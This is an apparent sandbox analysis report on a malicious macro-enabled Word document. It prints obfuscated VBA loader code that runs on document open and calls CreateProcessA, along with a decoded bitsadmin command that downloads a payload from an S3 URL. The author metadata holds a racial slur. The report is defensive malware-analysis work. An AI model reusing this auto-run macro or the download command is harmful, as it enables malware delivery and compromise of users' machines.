
Analysis Report QW752ifEe6.bin

Overview

General Information

Sample Name:QW752ifEe6.bin (renamed file extension from bin to docm)
Analysis ID:361939
MD5:82b36c510877ca7a59d20415ff939e0e
SHA1:fad4080d60f4ed53c0fcbd0ec3005728cd99a909
SHA256:b8756966cf478aa401a067f14eefb57f34eea127348973350b14b5b53e3eec4f
Tags:maldoc
Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: QW752ifEe6.docm  Virustotal: Detection: 23%
Source: QW752ifEe6.docm  ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: QW752ifEe6.docm  Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731E7CAD-FA20-48C4-87C4-17800DB89026}.tmp

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Document contains an embedded VBA macro with suspicious strings
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Source: QW752ifEe6.docm  OLE, VBA macro line: Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
Document contains an embedded VBA with hexadecimal encoded strings
Source: QW752ifEe6.docm  Stream path 'VBA/NewMacros': found hex strings
Source: VBA code instrumentation  OLE, VBA macro: Module NewMacros, Function bRGVCEDPVTEFX, String 6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035
(Decoded two hex digits per character, this string reads: bitsadmin /transfer myDownloadJOb23 https://s3.ap-south-1.amazonaws.com/ans.video.input/transcode_input/profile16146815778005 ; the macro appends further decoded fragments to it before the CreateProcessA call, see the VBA Code listing below.)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: QW752ifEe6.docm  OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation  OLE, VBA macro: Module NewMacros, Function AutoOpen  Name: AutoOpen
Document contains embedded VBA macros
Source: QW752ifEe6.docm  OLE indicator, VBA macros: true
Document contains no OLE stream with summary information
Source: QW752ifEe6.docm  OLE indicator has summary info: false
Document has an unknown application name
Source: QW752ifEe6.docm  OLE indicator application name: unknown
Source: classification engine  Classification label: mal64.expl.winDOCM@1/7@0/0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\Desktop\~$752ifEe6.docm
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\AppData\Local\Temp\CVRD97D.tmp
Source: QW752ifEe6.docm  OLE document summary: title field not present or empty
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File read: C:\Users\desktop.ini
Source: QW752ifEe6.docm  Virustotal: Detection: 23%
Source: QW752ifEe6.docm  ReversingLabs: Detection: 32%
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process information set: NOOPENFILEERRORBOX (32 identical entries)

Mitre Att&ck Matrix

Each tactic column of the report's matrix is listed below with its two rows; the trailing numbers are the report's own annotations marking the techniques matched by this sample's signatures (Scripting, Masquerading, File and Directory Discovery, System Information Discovery, Ingress Tool Transfer), the other cells are the unmatched matrix entries.

  • Initial Access: Valid Accounts | Default Accounts
  • Execution: Scripting 32 | Scheduled Task/Job
  • Persistence: Path Interception | Boot or Logon Initialization Scripts
  • Privilege Escalation: Path Interception | Boot or Logon Initialization Scripts
  • Defense Evasion: Masquerading 1 | Scripting 32
  • Credential Access: OS Credential Dumping | LSASS Memory
  • Discovery: File and Directory Discovery 1 | System Information Discovery 1
  • Lateral Movement: Remote Services | Remote Desktop Protocol
  • Collection: Data from Local System | Data from Removable Media
  • Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth
  • Command and Control: Ingress Tool Transfer 1 | Junk Data
  • Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS
  • Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization
  • Impact: Modify System Partition | Device Lockout

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source            Detection   Scanner          Label
QW752ifEe6.docm   24%         Virustotal
QW752ifEe6.docm   33%         ReversingLabs    Script-Macro.Trojan.Powload
QW752ifEe6.docm   100%        Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:361939
Start date:03.03.2021
Start time:11:45:18
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 13m 44s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:QW752ifEe6.bin (renamed file extension from bin to docm)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.winDOCM@1/7@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Max analysis timeout: 720s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C3C4E1E.png
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image data, 968 x 845, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):613151
Entropy (8bit):7.995665289860801
Encrypted:true
SSDEEP:12288:97sLONzMmJUo9b7OKpdBqqW1xfVKihzxAs2Rj4F+VAw:9kONAWUo9bCK1qt0ijYc+VAw
MD5:DBB01680A5AF46AE380439A62FFC53F6
SHA1:5212A4A414EB7024B3478BEB8F3572593BC76BCC
SHA-256:469E48DA69D2E63A4E209B770F886F8F7463B6C25E25642E894B16ADDDF29B98
SHA-512:9DE5F255561F73A8861E3D7367970FCC6C65A715A892D3282F82D82C771218CEA5E908CBA5AACF329206198872420AF3B116F1BBF7DCB59B626A2A888060FF6D
Malicious:false
Reputation:low
Preview: .PNG........IHDR.......M.....K/Wi....pHYs..........+.... .IDATx..g.$......=DjY...Z.M^..=g....>?{f...\....E...l?.ux....j.['*2"...p.... .....:a.+B.7..s}p)............X(.|..(.8P...o.Q~....g..k.../...&....q.h..0.b..a>......!L.<...M0..<E.L. ...<j>.....F.. ..`..L..~..$q...=.e1?..e.Rh._...k..um..UuV.C..^.(V......,..<.@...$....._.!.7!...E......wE..<..m..E?....b..!.......g..-.."....IQ/..>K..#e..............n..?...".,4/S.I.I?....E.X.!>#&y.!.YJ..Lg-.y;.1...ei.....;./..5..E=-..n...B.\WiJ. ....\').^...B.b..=q.*"R.VXa..>,...`..<.....3.....1............0!..l.....P.V...b.]p(.........R..,.Yq.l.... ......Sv.}...rs....|.......3..(./F...)_.\.x<..|....c7./3#...f..=...B.....6..U-.....IJ..PS..&6aBV.u........S.......v#....$........B|8..$..B...5..@....... ............H~wA.J...\.t.... C.....X.....%..k._..ozZm..*w!.i.C....V(..t.s..w..OKWM|..^..ef.\K2_......I.1....qmN!..5.?_. VTJ.m..C.y.3..-.6].....:".vF..VX.]....k.1.P{.C.y....f..]u.[.../C.....r*..c...|.n<\.p.3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731E7CAD-FA20-48C4-87C4-17800DB89026}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EC948C2F-5218-4A38-A66D-F6FECB16C1E9}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):0.30894419111068266
Encrypted:false
SSDEEP:3:vltlflpY/44XldlN5WllllzNIDtb7ZlhQtChC:vlXYM//SDtb7ZUtP
MD5:3B49E66C8DF5B0357A68E5F0047F1E40
SHA1:2EE0055F794727102F44FFD4274EEEAEF1B3953D
SHA-256:11D8FDBE5786A420852CE73DF76D08E2642F8AABC9F6C7ACD277A74122C4D3FC
SHA-512:21584FC1AB7985EE60A87F3CAF1E8048E338ABD9B3986F617863AC0731F07B02CA6F1624A42F683817D63AC239B2D96FFB513CCE9689E14B96BA65DEDBDF55B6
Malicious:false
Reputation:low
Preview: ../.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QW752ifEe6.LNK
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 3 18:45:28 2021, mtime=Wed Mar 3 18:45:28 2021, atime=Wed Mar 3 18:45:40 2021, length=630460, window=hide
Category:dropped
Size (bytes):2038
Entropy (8bit):4.556604515631506
Encrypted:false
SSDEEP:48:87Tk/XT0jTDOHNQ/I+Qh27Tk/XT0jTDOHNQ/I+Q/:87Tk/XojTSi/I+Qh27Tk/XojTSi/I+Q/
MD5:3C2B0D8A01FD1B862D5E76900C125B92
SHA1:43D26FEEC3A3BE291CFAD6DF006A383741FC9006
SHA-256:E1A1BEF76FCAAE9D3C17F79F6A8B9B7CE52DA75B9F516CD5E8920A97A64D58BE
SHA-512:C3EC7262BAF46F1F58057DCDC9EA8FF9C09E423EBC03A3EE31F7517BD813750FC38E951723F76357B0380AD29E97E0A79EC5359C06194DDDBB210A29C14E05BB
Malicious:false
Reputation:low
Preview: L..................F.... .....P.e.....P.e...>.8.e................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....cR....Desktop.d......QK.XcR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....cR.. .QW752I~1.DOC..L......cR..cR..*.........................Q.W.7.5.2.i.f.E.e.6...d.o.c.m.......y...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\QW752ifEe6.docm.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.W.7.5.2.i.f.E.e.6...d.o.c.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9F.C...........[D_....3N...W...9F
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.469965389005501
Encrypted:false
SSDEEP:3:H/BPBFFosJBFFomxW/BPBFFov:H/BPDFJDFMBPDFy
MD5:A494FD1BF2AA035A353F8A30D052B79F
SHA1:D763E35EFA1AB6F2E08AE1BC0122BA7512A6B01F
SHA-256:BAC8304555932DE1C180342E575BA66AC396A82F621A20D4B8BB1DD9B1EDF13D
SHA-512:EA4ADDC637506AE1A47773BC5025C90B72B978F78100B12658B7D6CFC914BD5F120B1B709DFF59AAC5A7EBAAD4060C43CA9D1C9A310DCB2EB522DB4C461A7C24
Malicious:false
Reputation:low
Preview: [misc]..QW752ifEe6.LNK=0..QW752ifEe6.LNK=0..[misc]..QW752ifEe6.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.4311600611816426
Encrypted:false
SSDEEP:3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
MD5:F3E6EBAC97D4DEF04C645869D96DC090
SHA1:F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
SHA-256:67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
SHA-512:B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
Malicious:false
Reputation:moderate, very likely benign file
Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
C:\Users\user\Desktop\~$752ifEe6.docm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.4311600611816426
Encrypted:false
SSDEEP:3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
MD5:F3E6EBAC97D4DEF04C645869D96DC090
SHA1:F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
SHA-256:67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
SHA-512:B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
Malicious:false
Reputation:moderate, very likely benign file
Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General

File type:Microsoft Word 2007+
Entropy (8bit):7.995085153837643
TrID:
  • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
  • Word Microsoft Office Open XML Format document (49504/1) 32.35%
  • Word Microsoft Office Open XML Format document (43504/1) 28.43%
  • ZIP compressed archive (8000/1) 5.23%
File name:QW752ifEe6.docm
File size:633650
MD5:82b36c510877ca7a59d20415ff939e0e
SHA1:fad4080d60f4ed53c0fcbd0ec3005728cd99a909
SHA256:b8756966cf478aa401a067f14eefb57f34eea127348973350b14b5b53e3eec4f
SHA512:0298eb0fe329753a1f28e69d307d6ee86d06ff26059335745f5fbfbca755997d071385c519bae8819195eacf45b9c069826689de27f58b028086b7f3624bd7ed
SSDEEP:12288:S7sLONzMmJUo9b7OKpdBqqW1xfVKihzxAs2Rj4F+VAkT:SkONAWUo9bCK1qt0ijYc+VAkT
File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e6a2a2acbcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/361939/sample/QW752ifEe6.docm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:niggaer
Template:Normal.dotm
Last Saved By:niggaer
Revision Number:176
Total Edit Time:358
Create Time:2021-03-02T00:26:00Z
Last Saved Time:2021-03-02T10:43:00Z
Number of Pages:1
Number of Words:0
Number of Characters:3
Creating Application:Microsoft Office Word
Security:0

Document Summary

Number of Lines:1
Number of Paragraphs:1
Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:12.0000

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 8268
General
Stream Path:VBA/NewMacros
VBA File Name:NewMacros.bas
Stream Size:8268
Data ASCII:. . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . [ g s . . . . . . . . . . . . . . 4 . . . . . . . . . 8 . $ . s . . . o . . . . . . . . . C r e a t e P r o c e s s A . . C r e a t e P r o c e s s A . . . . . . G e t C u r r e n t D i r e c t o r y A . . i . . . 8 . x . n . . . y . . . . . . . . . W a i t F o r S i n g l e O b j e c t . G e t C u r r e n t D i r e c t o r y A . . . . . . 8 . . . . . P . . . . . . . . . . . W a i t F o r S i n g l e O b j e c t . . . . . .
Data Raw:01 16 01 00 00 a8 01 00 00 e4 0a 00 00 8c 01 00 00 68 02 00 00 ff ff ff ff ed 0a 00 00 91 17 00 00 00 00 00 00 01 00 00 00 a1 5b 67 73 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 34 00 01 01 b8 00 00 00 00 00 38 02 24 00 73 00 ff ff 6f 00 00 00 00 00 00 00 00 00 43 72 65 61 74 65 50 72 6f 63 65 73 73 41 00 00 43 72 65 61 74 65 50 72 6f 63 65 73 73 41 00 00 04 00 ff ff 47 65 74 43 75

VBA Code Keywords

Keyword
#Else
Const
gzdppyufultz
iFYFVDJZCMF
"WaitForSingleObject"
jGRYIJOIQECNZWKRWBO
Public
oBPCCMYYIVLQA
iZMSNEVO()
bMIJESOVOFPXNIGW
Long)
sBHTGKLDEYWA
jdrmcyqidsrv
Long,
kXEHZUMYUDDUTSHZMQG
xCZSHOMU
hMGQMFZNPUGWHWGDDUJH
structProcessInformation
Explicit
"GetCurrentDirectoryA"
kEDLLFOYANTEMWH
PtrSafe
bNUIATLRVDMAZCVWBE
Declare
vUXRBEFWWFVAP
nHQTKGIQSBRUKJ
vAGEFXNZUIALBSWQZLUC
InStr(tKTSMASYXK,
String,
kXEHZUMYUDDUTSHZMQG,
String)
jdrmcyqidsrv,
aBBMXFDPLCFE
mNWIGENREYIUGMPSNK
bHFOSKLPRUPEXYLBLM
nNLBYBCNSKGBCQMOMY
eWZICHCSUGVFF(mNWIGENREYIUGMPSNK,
&HFFFFFFFF
pJAKUAJMMK
Option
vDFBEKYQKFLIEV
uRRNLDPOUTLCYKOUQNRX)
LongPtr,
eWZICHCSUGVFF
"GetCurrentDirectory"
gADXEXOUMAYJAS
hCCSLJIPWBXJZFSMOBC
zGIDNKNRS
mtfxdlgfwsxa
Boolean,
tKTSMASYXK)
lpProcessInformation
kJPTFUFMQKIIDRNB
ByVal
Mid$(gzdppyufultz,
rPXYQAUNQANDHLJU
qDNZSFLJWGOZU
sBMDCJNRZMFA
cOZQUISIGDQOQWG
lYFQGPKFNCVHQPCIKI(vUXRBEFWWFVAP,
structStartupInfo
vYBNYBMWDIOPXGQLY
(ByVal
uRRNLDPOUTLCYKOUQNRX
AutoOpen()
mtfxdlgfwsxa(ByVal
mDRJCTPAMQBQHAAQTWK
Chr$(Val("&H"
lZHEGTMHAR)
Len(gzdppyufultz)
structProcessInformation)
Integer
uXDIHQSDQDSFURPU
False,
Left(tKTSMASYXK,
nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY,
bRGVCEDPVTEFX
bRGVCEDPVTEFX()
qTQRKIHNKBFF
Attribute
pUOXYKNLRNVUOFQF
aKJTVBSGMCQYROMGH
lYFQGPKFNCVHQPCIKI
tKTSMASYXK
eBOIVUIXGZQX
VB_Name
Space(vUXRBEFWWFVAP)
bOKVRZINWWRNBYT
Function
mNWIGENREYIUGMPSNK,
jPEZPVSRELZDREQJPKQC
iBKFPVIEFUQC
jPEZPVSRELZDREQJPKQC,
lZHEGTMHAR
pLLESESKSWWRPH
structStartupInfo,
vbNullChar)
"NewMacros"
Alias
xQFYQCXKQZVW
String
tAFLNIDKOSMPLAQ
"CreateProcessA"
Private
lpStartupInfo
jVGXVBEGDZYNGKPD
iQDBSREAJJVCDBLKAGX
eXJVYDYJMQX
VBA Code
Attribute VB_Name = "NewMacros"
Option Explicit
#If Win64 Then
Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
#Else
Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
#End If
Private Type kXEHZUMYUDDUTSHZMQG
uXDIHQSDQDSFURPU As Long
gADXEXOUMAYJAS As String
zGIDNKNRS As String
bOKVRZINWWRNBYT As String
mDRJCTPAMQBQHAAQTWK As Long
pUOXYKNLRNVUOFQF As Long
vAGEFXNZUIALBSWQZLUC As Long
pLLESESKSWWRPH As Long
eXJVYDYJMQX As Long
hCCSLJIPWBXJZFSMOBC As Long
qTQRKIHNKBFF As Long
kJPTFUFMQKIIDRNB As Long
oBPCCMYYIVLQA As Integer
hMGQMFZNPUGWHWGDDUJH As Integer
kEDLLFOYANTEMWH As Long
pJAKUAJMMK As Long
qDNZSFLJWGOZU As Long
vDFBEKYQKFLIEV As Long
End Type
Private Type lZHEGTMHAR
nNLBYBCNSKGBCQMOMY As Long
iFYFVDJZCMF As Long
bNUIATLRVDMAZCVWBE As Long
xCZSHOMU As Long
End Type
Private Const uRRNLDPOUTLCYKOUQNRX = &HFFFFFFFF
Private Const jPEZPVSRELZDREQJPKQC = &H8000000
Private Const vUXRBEFWWFVAP = 260
Public Sub bRGVCEDPVTEFX()
Dim mNWIGENREYIUGMPSNK As String
Dim structProcessInformation As lZHEGTMHAR
Dim structStartupInfo As kXEHZUMYUDDUTSHZMQG
Dim aBBMXFDPLCFE As Long
Dim eBOIVUIXGZQX As Long
Dim vYBNYBMWDIOPXGQLY As Long
Dim tKTSMASYXK As String
tKTSMASYXK = Space(vUXRBEFWWFVAP)
Dim iQDBSREAJJVCDBLKAGX As Long
iQDBSREAJJVCDBLKAGX = lYFQGPKFNCVHQPCIKI(vUXRBEFWWFVAP, tKTSMASYXK)
tKTSMASYXK = Left(tKTSMASYXK, InStr(tKTSMASYXK, vbNullChar) - 1)
